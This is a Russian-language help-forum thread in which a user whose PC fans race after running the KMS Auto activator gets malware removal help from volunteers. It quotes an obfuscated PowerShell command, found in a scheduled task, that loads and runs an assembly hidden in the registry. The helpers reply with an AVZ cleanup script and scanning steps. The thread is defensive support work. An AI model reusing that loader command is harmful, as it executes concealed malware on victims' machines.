Решена Кулера работают на максимум после запуска KMS Auto

[pericle223]

Пробовал активировать винду, запуская kms auto - ничего не произошло, загудели кулера так будто запущено что-то тяжелое сейчас работает, также когда открываешь диспетчер задач - через пару секунд кулера замедляются, и потом переходят в штатный режим, стоит закрыть диспетчер задач - снова максимальные обороты, открытых программ кроме браузера нет.
Также заметил что как только открываешь диспетчер задач, частота процессора около 4GHz, но при этом нагрузка 1-3%, сейчас когда диспетчер задач уже запущен - нагрузка нормальная около 1.5 GHz. Может так и должно быть с работой процессора - точно не знаю. Но сам факт - кулера на пределе постоянно после запуска KMS Auto(его уже удалил с компьютера)

 

[pericle223]

Сканирование через CureIt нашло 2 угрозы - dialersvc32/64, но CureIt вылечить их не смог, они также видны через Autoruns, отключил их автозапуск через Autoruns, через планировщик Task Scheduler видно, что это запуск Powershell с какими то аргументами, вот они:
".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO:\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\"lR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"

Что это может быть?

 

[thyrex]

Правила оформления запроса о помощи

 

[pericle223]

Прикрепляю логи с AutoLogger

 

[Sandor]

Здравствуйте!

До сбора логов Автологером какие-то самостоятельные действия по очистке уже предпринимали?

 

[Sandor]

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

begin
 DeleteSchedulerTask('GoogleUpdateTaskMachineQC');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
RebootWindows(false);
end.

Компьютер перезагрузится.


Дополнительно:
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.

 

[pericle223]

Здравствуйте!

До сбора логов Автологером какие-то самостоятельные действия по очистке уже предпринимали?

Здравствуйте, Сканирование через Dr.Web CureIt, только удаление dialersvc32/64 из Планировщика задач, вроде проблемы больше не наблюдается, но может от него какие-то хвосты могли остаться?

 

[Sandor]

Понятно. Проделайте то, что рекомендовано в моём предыдущем сообщении.

 

[pericle223]

Выполнил сканирование через Farbar Recovery Scan Tool

 

[Sandor]

Хорошо, больше чистить ничего не нужно.
Если проблема решена, в завершение:

1.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.

2.

• Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
• Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
• Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
• Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
• Прикрепите этот файл к своему следующему сообщению.

 

[pericle223]

Результаты сканирования SecurityCheck.

P.S. Благодарю за оказанную помощь!

 

[Sandor]

Постарайтесь учесть и исправить перечисленное:

------------------------------- [ HotFix ] --------------------------------
HotFix KB5022834 Warning! Download Update
--------------------------- [ OtherUtilities ] ----------------------------
Git v.2.39.0.2 Warning! Download Update
NVIDIA GeForce Experience 3.26.0.154 v.3.26.0.154 Warning! Download Update
Microsoft Visual Studio Code (User) v.1.75.1 Warning! Download Update
Notepad++ (32-bit x86) v.8.0 Warning! Download Update
-------------------------- [ IMAndCollaborate ] ---------------------------
Discord v.1.0.9007 Warning! Download Update
--------------------------------- [ P2P ] ---------------------------------
µTorrent v.3.6.0.46716 Warning! Ad-supported P2P-client.
------------------------------- [ Browser ] -------------------------------
Mozilla Firefox (x64 ru) v.107.0.1 Warning! Download Update
Yandex v.23.1.4.778 Warning! Download Update
Microsoft Edge v.108.0.1462.54 Warning! Download Update


С программами, скачанными с торрента будьте аккуратнее.
Читайте Рекомендации после удаления вредоносного ПО